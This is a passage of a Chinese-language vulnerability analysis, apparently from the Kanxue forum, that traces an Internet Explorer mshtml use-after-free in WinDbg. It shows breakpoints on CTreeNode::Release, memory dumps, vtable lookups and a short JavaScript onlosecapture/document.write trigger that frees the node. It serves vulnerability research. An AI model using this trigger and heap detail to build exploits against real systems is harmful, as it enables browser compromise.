1:021> g Breakpoint 6 hit eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978 eip=6c77d67f esp=0441e874 ebp=0441e8b0 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 jscript!cos: 6c77d67f ff259010756c jmp dword ptr [jscript!_imp__cos (6c751090)] ds:0023:6c751090={msvcrt!cos (773d8ace)}
断在辅助语句上
1:021> g Breakpoint 2 hit eax=06eaafd8 ebx=06e42fd8 ecx=063f06ec edx=06ab8fb0 esi=06ab8fb0 edi=06eaafd8 eip=6a2fe563 esp=0441e440 ebp=0441e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::Release: 6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds:0023:06ab8ff0=00000012 1:021> dd edx 06ab8fb0 06e42fd8 077a2fb0 00020260 00030001 06ab8fc0 00000061 00000000 07337fd8 07382fe0 06ab8fd0 07382fe0 07337fc0 00000062 00000000 06ab8fe0 07390fe0 07337fd8 07337fd8 07390fe0 06ab8ff0 00000012 00000000 00000000 d0d0d0d0 06ab9000 ???????? ???????? ???????? ???????? 06ab9010 ???????? ???????? ???????? ???????? 06ab9020 ???????? ???????? ???????? ???????? 1:021> dd 06e42fd8 06e42fd8 6a0f70e0 00000006 00000020 06aaafe8 06e42fe8 062c5f21 06ab8fb0 00000060 82010200 06e42ff8 00000002 075c2f30 ???????? ???????? 06e43008 ???????? ???????? ???????? ???????? 06e43018 ???????? ???????? ???????? ???????? 06e43028 ???????? ???????? ???????? ???????? 06e43038 ???????? ???????? ???????? ???????? 06e43048 ???????? ???????? ???????? ???????? 1:021> ln 6a0f70e0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information>
可见CPhraseElement的CTreeNode又被释放了,这是由于
id_0.onlosecapture=function(e) {
document.write("");
}
造成的
1:021> g Breakpoint 7 hit eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978 eip=6c77d711 esp=0441e874 ebp=0441e8b0 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 jscript!sin: 6c77d711 ff256810756c jmp dword ptr [jscript!_imp__sin (6c751068)] ds:0023:6c751068={msvcrt!sin (773d8aea)}
1:021> g Breakpoint 2 hit eax=0736cfa8 ebx=00000000 ecx=00000720 edx=07337fb0 esi=07337fb0 edi=06e4efc8 eip=6a2fe563 esp=0441e48c ebp=0441e5e0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::Release: 6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds:0023:07337ff0=00000008 1:021> dd edx 07337fb0 06e4efc8 00000000 ffff0075 ffffffff 07337fc0 00000051 00000000 00000000 00000000 07337fd0 00000000 07337fd8 00000152 00000001 07337fe0 00000000 00000000 07337fc0 06ab8fd8 07337ff0 00000008 00000000 00000000 d0d0d0d0 07338000 ???????? ???????? ???????? ???????? 07338010 ???????? ???????? ???????? ???????? 07338020 ???????? ???????? ???????? ???????? 1:021> dd 06e4efc8 06e4efc8 6a11c2e8 00000002 00000008 0738cfe8 06e4efd8 062c5ef0 07337fb0 80000075 88010200 06e4efe8 00000002 075c2f30 06e96ff4 00000000 06e4eff8 00000000 00000000 ???????? ???????? 06e4f008 ???????? ???????? ???????? ???????? 06e4f018 ???????? ???????? ???????? ???????? 06e4f028 ???????? ???????? ???????? ???????? 06e4f038 ???????? ???????? ???????? ???????? 1:021> ln 6a11c2e8 (6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable' Exact matches: mshtml!CGenericElement::`vftable' = <no type information>
声明:该文观点仅代表作者本人,转载请注明来自看雪